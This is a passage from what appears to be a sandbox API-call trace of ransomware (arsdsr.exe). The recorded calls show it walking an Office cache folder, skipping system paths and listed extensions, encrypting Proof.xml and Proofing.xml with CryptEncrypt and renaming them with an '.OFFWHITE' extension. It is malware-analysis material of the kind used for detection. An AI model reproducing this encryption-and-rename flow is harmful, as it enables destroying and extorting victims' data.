lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" [0084.164] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.164] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.164] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0084.164] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0084.164] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0084.164] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0084.164] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2=".") returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="..") returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="...") returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="windows") returned -1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="$recycle.bin") returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="rsa") returned -1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="ntuser.dat") returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="programdata") returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="appdata") returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="program files") returned 1 [0084.164] lstrcmpiW (lpString1="Proof.msi", lpString2="program files (x86)") returned 1 [0084.164] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" [0084.164] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpString2="Proof.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" [0084.164] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.164] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.164] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0084.164] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.165] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.165] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2=".") returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="..") returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="...") returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="windows") returned -1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="$recycle.bin") returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="rsa") returned -1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="ntuser.dat") returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="programdata") returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="appdata") returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="program files") returned 1 [0084.165] lstrcmpiW (lpString1="Proof.xml", lpString2="program files (x86)") returned 1 [0084.165] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" [0084.166] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpString2="Proof.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" [0084.166] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.166] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.166] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.166] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.166] lstrcmpiW (lpString1="Proof.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.166] GetProcessHeap () returned 0x500000 [0084.166] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be40 [0084.166] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0084.167] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=1458) returned 1 [0084.167] GetProcessHeap () returned 0x500000 [0084.167] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.167] GetProcessHeap () returned 0x500000 [0084.167] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.167] GetProcessHeap () returned 0x500000 [0084.167] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.167] GetProcessHeap () returned 0x500000 [0084.167] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.167] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.167] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.167] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.167] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.167] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.167] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.167] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.167] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.167] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0084.168] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.168] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.168] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0084.168] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x5b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.168] SetLastError (dwErrCode=0x0) [0084.168] WriteFile (in: hFile=0x214, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0084.185] GetLastError () returned 0x0 [0084.185] GetLastError () returned 0x0 [0084.185] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.185] WriteFile (in: hFile=0x214, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0084.185] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x7b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.185] WriteFile (in: hFile=0x214, lpBuffer=0x52be40*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52be40*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0084.186] GetProcessHeap () returned 0x500000 [0084.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5b2) returned 0x546980 [0084.186] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.186] ReadFile (in: hFile=0x214, lpBuffer=0x546980, nNumberOfBytesToRead=0x5b2, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295dec0*=0x5b2, lpOverlapped=0x0) returned 1 [0084.186] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.186] WriteFile (in: hFile=0x214, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295decc*=0x5b2, lpOverlapped=0x0) returned 1 [0084.186] GetProcessHeap () returned 0x500000 [0084.186] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0084.186] CloseHandle (hObject=0x214) returned 1 [0084.189] GetProcessHeap () returned 0x500000 [0084.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.189] GetProcessHeap () returned 0x500000 [0084.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.189] GetProcessHeap () returned 0x500000 [0084.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.189] GetProcessHeap () returned 0x500000 [0084.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.189] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" [0084.189] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.OFFWHITE" [0084.189] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.offwhite")) returned 1 [0084.190] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0084.190] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0084.191] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2=".") returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="..") returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="...") returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="windows") returned -1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="$recycle.bin") returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="rsa") returned -1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="ntuser.dat") returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="programdata") returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="appdata") returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="program files") returned 1 [0084.191] lstrcmpiW (lpString1="Proofing.msi", lpString2="program files (x86)") returned 1 [0084.191] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0084.191] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proofing.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" [0084.191] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.191] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.191] PathFindExtensionW (pszPath="Proofing.msi") returned=".msi" [0084.191] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.191] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.191] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.191] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.191] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.192] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.192] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2=".") returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="..") returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="...") returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="windows") returned -1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="$recycle.bin") returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="rsa") returned -1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="ntuser.dat") returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="programdata") returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="appdata") returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="program files") returned 1 [0084.192] lstrcmpiW (lpString1="Proofing.xml", lpString2="program files (x86)") returned 1 [0084.192] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0084.192] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proofing.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" [0084.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.193] PathFindExtensionW (pszPath="Proofing.xml") returned=".xml" [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.193] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.193] lstrcmpiW (lpString1="Proofing.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.193] GetProcessHeap () returned 0x500000 [0084.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be50 [0084.193] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.194] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=811) returned 1 [0084.194] GetProcessHeap () returned 0x500000 [0084.194] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.194] GetProcessHeap () returned 0x500000 [0084.194] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.194] GetProcessHeap () returned 0x500000 [0084.194] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.194] GetProcessHeap () returned 0x500000 [0084.194] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.194] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.194] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.194] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.194] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.194] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.194] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.194] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.194] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.194] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.195] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.195] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.195] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.195] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x32b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.195] SetLastError (dwErrCode=0x0) [0084.195] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.198] GetLastError () returned 0x0 [0084.198] GetLastError () returned 0x0 [0084.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x42b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.199] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x52b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.199] WriteFile (in: hFile=0x21c, lpBuffer=0x52be50*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52be50*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.199] GetProcessHeap () returned 0x500000 [0084.199] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x32b) returned 0x547ba0 [0084.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.199] ReadFile (in: hFile=0x21c, lpBuffer=0x547ba0, nNumberOfBytesToRead=0x32b, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x547ba0*, lpNumberOfBytesRead=0x295e540*=0x32b, lpOverlapped=0x0) returned 1 [0084.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.199] WriteFile (in: hFile=0x21c, lpBuffer=0x547ba0*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: 